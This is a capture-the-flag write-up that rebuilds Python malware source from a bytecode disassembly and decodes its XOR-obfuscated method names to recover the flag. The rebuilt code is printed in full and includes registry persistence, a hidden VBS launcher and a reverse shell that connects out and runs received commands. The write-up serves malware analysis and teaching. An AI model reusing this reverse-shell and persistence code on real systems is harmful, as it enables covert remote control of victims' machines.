Rating: 5.0

Task

> This file was recovered from a malware infected machine, help us to uncover its secrets.
>
> Attachment: ekans.zip

Category: Practical

Unzipping the archive yields a 400-line text file called `ekans.txt` ([download](https://gist.github.com/maurom/325e9ec3c26c17f78a47ab3c056d275c#file-ekans-txt)) that looks like some sort of disassembly. A few keywords in the file (`encode`, `b64decode`, `currentframe`, ...) reveal that it is, in fact, a Python bytecode disassembly, such as the output of [dis - Disassembler for Python bytecode](https://docs.python.org/3/library/dis.html).

```
Disassembly of EdOxwEACgFH:
Disassembly of AC8AAxkqHjQGPxcvCzwdKGQ8:
27 0 LOAD_FAST 0 (self)
2 LOAD_ATTR 0 (__class__)
4 LOAD_ATTR 1 (__name__)
6 LOAD_METHOD 2 (encode)
8 CALL_METHOD 0
10 STORE_FAST 1 (mask)

28 12 LOAD_GLOBAL 3 (len)
14 LOAD_FAST 1 (mask)
16 CALL_FUNCTION 1
18 STORE_FAST 2 (lmask)

...
```

In essence, the CPython interpreter can be seen as a stack-based virtual machine, and thankfully the line format is detailed in [disco](https://docs.python.org/3/library/dis.html#dis.disco) and the opcodes in the [Python Bytecode Instructions](https://docs.python.org/3/library/dis.html#python-bytecode-instructions) documentation:

```
Source-Line-Number Bytecode-Address Opcode-Name Parameters Interpretation
```
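To make that line format concrete, here is a minimal sketch of a parser for one listing line. The regular expression, the `Instr` tuple and the `parse_line` helper are my own hypothetical names, not part of the `dis` module, and the pattern only assumes the five columns described above (with the source line number being optional).

```python
import re
from typing import NamedTuple, Optional

# Hypothetical helper; the field names are my own labels, not part of `dis`.
LINE_RE = re.compile(
    r"^\s*(?:(?P<lineno>\d+)\s+)?"      # source line number (first opcode of a line only)
    r"(?:>>\s+)?"                        # optional jump-target marker
    r"(?P<offset>\d+)\s+"                # bytecode offset
    r"(?P<opname>[A-Z][A-Z0-9_]*)"       # opcode name
    r"(?:\s+(?P<arg>\d+))?"              # numeric argument, if any
    r"(?:\s+\((?P<argrepr>.*)\))?\s*$"   # human-readable interpretation
)


class Instr(NamedTuple):
    lineno: Optional[int]
    offset: int
    opname: str
    arg: Optional[int]
    argrepr: Optional[str]


def _to_int(text):
    return int(text) if text is not None else None


def parse_line(text: str) -> Optional[Instr]:
    """Parse one listing line; return None for headers and blank lines."""
    m = LINE_RE.match(text)
    if m is None:
        return None
    return Instr(_to_int(m["lineno"]), int(m["offset"]), m["opname"],
                 _to_int(m["arg"]), m["argrepr"])


print(parse_line("27 0 LOAD_FAST 0 (self)"))
print(parse_line("8 CALL_METHOD 0"))
```

Lines such as `Disassembly of EdOxwEACgFH:` do not match and come back as `None`, which is a cheap way to tell block headers from instructions.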

So the first decoded block of that file tells us that on line `27` of the
(unknown yet) original source code:

1. There's an `EdOxwEACgFH` block (a class, maybe?), and inside it there's an `AC8AAxkqHjQGPxcvCzwdKGQ8` block (a method, probably), and inside it...
2. the first opcode, on offset `0`, [`LOAD_FAST`](https://docs.python.org/3/library/dis.html#opcode-LOAD_FAST)
pushes a reference to the local `self` variable onto the stack;
3. the next opcode, on offset `2`, [`LOAD_ATTR`](https://docs.python.org/3/library/dis.html#opcode-LOAD_ATTR)
replaces the top-of-stack value with the attribute `__class__` of the object
contained in the top-of-stack (`self`);
4. the next opcode does similarly, but now operating over `__class__`, so it
loads the attribute `__name__` on top of the stack;
5. the next opcode [`LOAD_METHOD`](https://docs.python.org/3/library/dis.html#opcode-LOAD_METHOD)
loads the method `encode` of the top-of-stack object;
6. the next one [`CALL_METHOD`](https://docs.python.org/3/library/dis.html#opcode-CALL_METHOD)
is, well, self-explanatory: it calls the method `encode` with no arguments,
popping the two top-of-stack objects and pushing the result onto the stack;
7. finally [`STORE_FAST`](https://docs.python.org/3/library/dis.html#opcode-STORE_FAST)
stores the top-of-stack object into the variable `mask`.

That is:

```python
class EdOxwEACgFH:
    def AC8AAxkqHjQGPxcvCzwdKGQ8(self):
        mask = self.__class__.__name__.encode()  # line 27
        ...
```

Line 28 onwards is left as an exercise for the reader.
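A quick way to check a hand translation like this one is to disassemble the candidate and look at the opcode names it produces. The sketch below does that for the single statement of line 27; `opnames` is a hypothetical helper of mine, and the exact opcodes printed depend on the interpreter version you run it with, so only a listing from a matching Python version should be compared against `ekans.txt`.

```python
import dis


class EdOxwEACgFH:
    def AC8AAxkqHjQGPxcvCzwdKGQ8(self):
        mask = self.__class__.__name__.encode()  # candidate for line 27


def opnames(func):
    """Return the opcode names of a function, in order (hypothetical helper)."""
    return [ins.opname for ins in dis.get_instructions(func)]


names = opnames(EdOxwEACgFH.AC8AAxkqHjQGPxcvCzwdKGQ8)
print(names)
```

If the sequence printed for the candidate lines up with the block in the listing, the translation of that statement is probably right.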

We did a quick search for automatic (_magic!_) "re-assemblers" of this source format, but found none; so, rolling up my sleeves, I started parsing this bit by bit.

After converting every block of code, I had to add the required imports of the modules `base64`, `inspect`, `os`, `socket` and `subprocess`; I skipped `winreg` because this is a Linux machine and we don't allow such modules here, hehe. Also, some constants are never defined in the disassembly, so I set them to `None` or `''`.

Finally, the order of the methods in the disassembly does not match the order in the source (`dis.dis` lists the members of a class sorted by name, not in definition order), so I had to reorder the methods a little bit in my source code until its line numbers matched the ones in the disassembly.
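One likely reason for the shuffled order is that `dis.dis`, when given a class, walks the class dictionary sorted by name. A minimal sketch with a made-up `Demo` class (the class and method names are mine, purely for illustration) shows the effect:

```python
import dis
import io


class Demo:
    # Deliberately defined in the order zeta, alpha.
    def zeta(self):
        return 1

    def alpha(self):
        return 2


buf = io.StringIO()
dis.dis(Demo, file=buf)  # write the listing into a string instead of stdout
headers = [line for line in buf.getvalue().splitlines()
           if line.startswith("Disassembly of")]
print(headers)  # ['Disassembly of alpha:', 'Disassembly of zeta:']
```

So the source line numbers in the listing, not the order of the blocks, are what tell you where each method belongs.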

This is what I got:

```python
#!/usr/bin/env python3

import base64
import inspect
import os
import socket
import subprocess
# from winreg import EnumValue, OpenKey, SetValueEx, HKEY_LOCAL_MACHINE, KEY_ALL_ACCESS, REG_SZ

KEY_NAME = ''
KEY_PATH = ''
REV_SHELL = ''
SHELL_PORT = ''
TRIGGER_PATH = ''
MALWARE_NAME = ''
MALWARE_PATH = ''

class EdOxwEACgFH:

    def NRYgDBImHhwT(self, byt):
        mask = self.__class__.__name__.encode()
        lmask = len(mask)
        return bytes(c ^ mask[i % lmask] for i, c in enumerate(byt))

    def AC8AAxkqHjQGPxcvCzwdKGQ8(self):
        mask = self.__class__.__name__.encode() # 27
        lmask = len(mask)
        self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
        key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
        keys = []
        try:
            i = 0
            while True:
                cur_key = EnumValue(key, i)
                keys.append(cur_key[0])
                i += 1
        except:
            pass
        if KEY_NAME not in keys:
            mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
            SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
            mlwr_key.Close()
            return False
        return True

    def LQ0rHSgoIC8QJzog(self):
        mask = self.__class__.__name__.encode()
        lmask = len(mask)
        self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
        if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
            return True
        else:
            payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
            with open(TRIGGER_PATH, 'w') as f:
                f.write(payload)
            os.system('copy %s %s' % (MALWARE_NAME, MALWARE_PATH))
            return False

    def AwE5HQU2JDAPIyQp(self):
        mask = self.__class__.__name__.encode() # 65
        self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((REV_SHELL, SHELL_PORT))
        flag = b'JgsiFRYrJWNHfGhl'
        s.send('\n\\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
        while True:
            data = s.recv(1024)
            if 'quit' in data:
                break
            cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            saida_cmd = cmd.stdout.read() + cmd.stderr.read()
            s.send(saida_cmd)
            s.send(self.NRYgDBImHhwT(base64.b64decode(flag)))
        s.close()

def main():
    my_returns = []
    x = EdOxwEACgFH()
    my_returns.append(x.AC8AAxkqHjQGPxcvCzwdKGQ8())
    my_returns.append(x.LQ0rHSgoIC8QJzog())
    if all(res is True for res in my_returns):
        x.AwE5HQU2JDAPIyQp()
```

You can find a detailed explanation linking each block to each statement on [this github gist](https://gist.github.com/maurom/325e9ec3c26c17f78a47ab3c056d275c).

I saved the file as `/tmp/mw.py` (as some lines mention that path) and ran the disassembler:

```bash
$ cd /tmp
$ python3 > output.txt <<EOF
import dis
import mw
dis.dis(mw)
EOF

diff -wB output.txt ekans.txt # compare our disassembly with the original
```

The first time I tried, there were some differences because my own disassembly contained `SETUP_LOOP` opcodes that the original does not have. Hmm...

Well, I was using Python 3.7, and it turns out that in Python 3.8 [they got rid of `SETUP_LOOP` and similar opcodes](https://docs.python.org/3/whatsnew/3.8.html#cpython-bytecode-changes). As the malware disassembly does not have any such opcodes, now we know that the person who compiled/disassembled the file was using that version or a newer one.
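The same reasoning can be turned into a rough heuristic. The sketch below is my own hypothetical helper, not something from the challenge: it assumes that `SETUP_LOOP` only appears up to Python 3.7 and that `CALL_METHOD` exists from 3.7 through 3.10 (it went away in 3.11), and it is only meaningful when the code being examined actually contains loops and method calls.

```python
import re


def guess_python_range(listing: str) -> str:
    """Guess the CPython version range from opcode names in a dis listing.

    Hypothetical heuristic: it looks at just two marker opcodes and
    assumes the disassembled code has at least one loop and method call.
    """
    ops = set(re.findall(r"\b[A-Z][A-Z0-9_]+\b", listing))
    if "SETUP_LOOP" in ops:
        return "3.7 or older"
    if "CALL_METHOD" in ops:
        return "3.8-3.10"
    return "unknown"


sample = """\
27 0 LOAD_FAST 0 (self)
6 LOAD_METHOD 2 (encode)
8 CALL_METHOD 0
"""
print(guess_python_range(sample))  # 3.8-3.10
```

For `ekans.txt`, which has loops but no `SETUP_LOOP`, and which uses `CALL_METHOD`, this points at the 3.8 to 3.10 range, consistent with the 3.8 guess.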

So now, armed with a dockerized python3.8...

```bash
$ cd /tmp
$ python3.8 > output.txt <<EOF
import dis
import mw
dis.dis(mw)
EOF

diff -wB output.txt ekans.txt # compare our disassembly with the original
```

```diff
314c315
< 28 LOAD_CONST 1 (<code object <genexpr> at 0x7fd96d5962f0, file "/tmp/mw.py", line 24>)
---
> 28 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>)
325c326
< Disassembly of <code object <genexpr> at 0x7fd96d5962f0, file "/tmp/mw.py", line 24>:
---
> Disassembly of <code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>:
370c373
< 40 LOAD_CONST 1 (<code object <genexpr> at 0x7fd96d3f89d0, file "/tmp/mw.py", line 86>)
---
> 40 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>)
386c389
< Disassembly of <code object <genexpr> at 0x7fd96d3f89d0, file "/tmp/mw.py", line 86>:
---
> Disassembly of <code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>:
```

Save for memory addresses, the disassembly of the hand-made source is identical to the original listing, so we're good to go. Read the [_Evolving Exact Decompilation_ paper](https://www.cs.unm.edu/~eschulte/data/bed.pdf) by Schulte et al. if you, like me, are interested in byte-equivalent decompilation.
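If you'd rather not eyeball the address noise, the comparison can be done in Python with the addresses masked out first. This is a minimal sketch under my own assumptions: `normalize` and `listing_diff` are hypothetical helpers, the `0xADDR` placeholder is arbitrary, and collapsing runs of whitespace only approximates what `diff -wB` does.

```python
import difflib
import re

ADDR_RE = re.compile(r"\bat 0x[0-9a-fA-F]+")


def normalize(listing: str) -> list:
    """Mask memory addresses, collapse whitespace and drop blank lines."""
    lines = []
    for line in listing.splitlines():
        line = " ".join(ADDR_RE.sub("at 0xADDR", line).split())
        if line:
            lines.append(line)
    return lines


def listing_diff(ours: str, theirs: str) -> list:
    """Return unified-diff lines; an empty list means the listings match."""
    return list(difflib.unified_diff(normalize(ours), normalize(theirs),
                                     "output.txt", "ekans.txt", lineterm=""))


ours = '28 LOAD_CONST 1 (<code object <genexpr> at 0x7fd96d5962f0, file "/tmp/mw.py", line 24>)\n'
theirs = '28  LOAD_CONST  1 (<code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>)\n\n'
print(listing_diff(ours, theirs))  # []
```

In practice you would read `output.txt` and `ekans.txt` from disk and pass their contents to `listing_diff`.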

Well, by reading the source we can see that it is a part or a component of a Windows malware that sets a registry value for persistence and, in `AwE5HQU2JDAPIyQp()`, opens a reverse shell by connecting out to a remote host.

On the same method there's an interesting `flag` variable `'JgsiFRYrJWNHfGhl'` that is "decoded" with the `NRYgDBImHhwT()` method and sent to a remote user every time after a command is received.

So checking out the `NRYgDBImHhwT()` method we find out that it basically does XOR of a byte sequence with the name of the current class `EdOxwEACgFH`.
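Stripped of the class, the routine is a plain repeating-key XOR. Here is a standalone sketch (the function name `xor_mask` and the sample plaintext are mine) that also shows why the same method works for both encoding and decoding: applying it twice with the same key gives back the input.

```python
from itertools import cycle


def xor_mask(data: bytes, key: bytes) -> bytes:
    """XOR every byte of `data` with the key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


key = b"EdOxwEACgFH"   # the class name, as used by the malware
sample = b"hello world"  # arbitrary plaintext, just for the round trip

masked = xor_mask(sample, key)
restored = xor_mask(masked, key)
print(masked, restored)
```

Because the key is the class name itself, renaming the class would silently change every decoded string, which is worth keeping in mind when rebuilding the source.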

So the first step is to pass `flag` through `NRYgDBImHhwT()` and see what comes out:

```bash
$ python3
> from base64 import b64decode
> from mw import EdOxwEACgFH
> EdOxwEACgFH().NRYgDBImHhwT(b64decode(b'JgsiFRYrJWNHfGhl'))
b'command  :  '
```

Oh, that's not the flag we were expecting. Damn!

However, every function name in this file seems fishy; let's run `NRYgDBImHhwT()` against every method name in the class:

```
$ python3
> from base64 import b64decode
> from mw import EdOxwEACgFH
>
> obj = EdOxwEACgFH()
> for name in dir(EdOxwEACgFH):
>     if not name.startswith('__'):
>         print(name, obj.NRYgDBImHhwT(b64decode(name)))

AC8AAxkqHjQGPxcvCzwdKGQ8 b'EKO{no_way_jose_!}'
AwE5HQU2JDAPIyQp b'Feverseshell'
LQ0rHSgoIC8QJzog b'hide_malware'
NRYgDBImHhwT b'protec__t'
```

Well, there you have it, José.

Flag: `EKO{no_way_jose_!}`